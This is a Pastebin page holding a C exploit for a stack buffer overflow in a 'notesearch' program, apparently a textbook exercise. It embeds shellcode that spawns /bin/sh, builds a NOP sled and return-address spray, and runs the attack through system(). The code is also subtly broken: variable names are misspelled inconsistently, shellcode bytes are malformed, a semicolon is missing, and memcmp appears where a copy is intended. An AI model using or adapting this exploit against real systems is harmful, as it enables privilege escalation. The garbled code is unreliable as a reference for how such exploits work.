Adm1n_0v3rride

exploit_notesearch.c

Sep 6th, 2017
174
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <stdio.h>
  2. #include <unistd.h>
  3. #include <string.h>
  4.  
  5. char shellcode[]=
  6. "\x31\xc0\x31\xd\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
  7. "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
  8. "xe1\xcd\x80";
  9.  
  10. int main(int argc, char *argv[]) {
  11.     unsigned int i, *ptr, ret, offset=270;
  12.     char *command, *buffer;
  13.    
  14.     commamd = (char *) malloc(200);
  15.     bzero(command, 200); // Zero out the new memory.
  16.    
  17.     strcpy(commamd, "./notesearch \'"); //Start commamd buffer.
  18.     buffer = commamd + strlen(command); // Set buffer at the end.
  19.    
  20.     if(argc > 1) // Set offset
  21.         offset = atoi(argv[1]);
  22.        
  23.     ret = (unsigned int) &i - offset // Set return address.
  24.    
  25.     for(i=0; i < 160; i+=4) // Fill buffer with return address.
  26.         *((unsigned int *)(buffer+i)) = ret;
  27.     memset(buffer, 0x90, 60); // Build NOP sled.
  28.     memcmp(buffer+60, shellcode, sizeof(shellcode)-1);
  29.    
  30.     strcat(command, "\'");
  31.    
  32.     system(command); //Run exploit.
  33.     free(command);
  34. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×